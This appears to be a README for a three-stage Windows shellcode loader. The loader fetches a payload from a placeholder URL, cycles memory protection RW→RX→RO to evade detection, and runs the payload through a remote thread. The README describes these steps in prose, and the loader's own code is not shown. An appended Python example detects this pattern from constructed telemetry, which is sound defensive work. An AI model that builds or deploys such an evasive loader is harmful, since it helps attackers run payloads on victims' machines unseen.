A three-stage shellcode loader that demonstrates memory protection manipulation for evasion. This project splits the execution flow across three separate executables to minimize detection signatures.
The loader operates in three distinct phases, each with its own executable:
- Stage 1: Downloads shellcode and allocates it with `PAGE_READWRITE` protection
- Stage 2: Changes memory protection to `PAGE_EXECUTE_READ` to enable execution
- Stage 3: Executes shellcode, then reverts protection to `PAGE_READONLY` to hide

Stage 1:
- Downloads shellcode from a remote HTTP server
- Allocates memory with `PAGE_READWRITE` protection
- Creates shared memory to communicate shellcode location
- Runs continuously, waiting for execution commands

Stage 2:
- Connects to Stage 1 via shared memory
- Changes memory protection from `READWRITE` to `EXECUTE_READ`
- Exits after changing permissions

Stage 3:
- Finds and connects to running loader
- Creates remote thread to execute shellcode
- Changes protection back to `READONLY` after execution
- Can be run multiple times (execution counter increments)

- Memory Protection Cycling: RW → RX → RO to minimize detection
- Shared Memory Coordination: Processes communicate via memory-mapped files
- Automatic Loader Discovery: Stage 3 can find running loaders automatically
- Re-executable: Shellcode can be run multiple times with protection toggling
- HTTP Payload Delivery: Remote shellcode fetching
- Configure the URL:

```c
#define SHELLCODE_URL "http://your-server/payload.bin"
```

This tool is for educational purposes only. Use only in environments you own or have explicit permission to test. The authors are not responsible for any misuse.
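
For defenders, the RW → RX → RO cycling and remote thread creation described above can be correlated per memory region. The following is an added example, not part of this project: the event schema, PIDs and addresses are constructed, and it assumes telemetry that records which process performed each allocation, protection change and thread creation.

```python
# Constructed sample telemetry in a hypothetical schema (not a real EDR/ETW format).
# "actor" is the PID making the call, "target" is the PID that owns the memory.
EVENTS = [
    {"t": 1, "op": "alloc", "actor": 4100, "target": 4100, "base": 0x1F0000, "size": 0x1000, "prot": "RW"},
    {"t": 2, "op": "protect", "actor": 5200, "target": 4100, "base": 0x1F0000, "new": "RX"},
    {"t": 3, "op": "thread", "actor": 6300, "target": 4100, "start": 0x1F0000},
    {"t": 4, "op": "protect", "actor": 6300, "target": 4100, "base": 0x1F0000, "new": "RO"},
    # JIT-like process: flips its own region to RX, no remote thread, no revert.
    {"t": 5, "op": "alloc", "actor": 7000, "target": 7000, "base": 0x2A0000, "size": 0x2000, "prot": "RW"},
    {"t": 6, "op": "protect", "actor": 7000, "target": 7000, "base": 0x2A0000, "new": "RX"},
]

def region_for(regions, pid, addr):
    """Return the tracked region of `pid` that contains `addr`, if any."""
    for r in regions:
        if r["pid"] == pid and r["base"] <= addr < r["base"] + r["size"]:
            return r
    return None

def detect_cycling(events):
    """Flag regions that go RW -> RX -> RO, are touched by other processes,
    and had a remote thread started inside them while executable."""
    regions = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["op"] == "alloc":
            regions.append({"pid": ev["target"], "base": ev["base"], "size": ev["size"],
                            "history": [ev["prot"]], "actors": {ev["actor"]},
                            "remote_thread": False})
            continue
        addr = ev["base"] if ev["op"] == "protect" else ev["start"]
        r = region_for(regions, ev["target"], addr)
        if r is None:
            continue
        r["actors"].add(ev["actor"])
        if ev["op"] == "protect":
            r["history"].append(ev["new"])
        elif ev["actor"] != ev["target"] and r["history"][-1] == "RX":
            r["remote_thread"] = True  # thread started by another process in an RX region
    findings = []
    for r in regions:
        h = r["history"]
        cycled = any(h[i:i + 3] == ["RW", "RX", "RO"] for i in range(len(h) - 2))
        foreign = sorted(r["actors"] - {r["pid"]})
        if cycled and r["remote_thread"] and foreign:
            findings.append({"pid": r["pid"], "base": r["base"],
                             "foreign_actors": foreign, "history": h})
    return findings

if __name__ == "__main__":
    for f in detect_cycling(EVENTS):
        print(f"PID {f['pid']} region {f['base']:#x}: {'->'.join(f['history'])} by {f['foreign_actors']}")
```

Requiring all three signals together (the full cycle, a foreign actor, and a remote thread start while the region is RX) keeps the self-modifying JIT-style region in the sample from alerting.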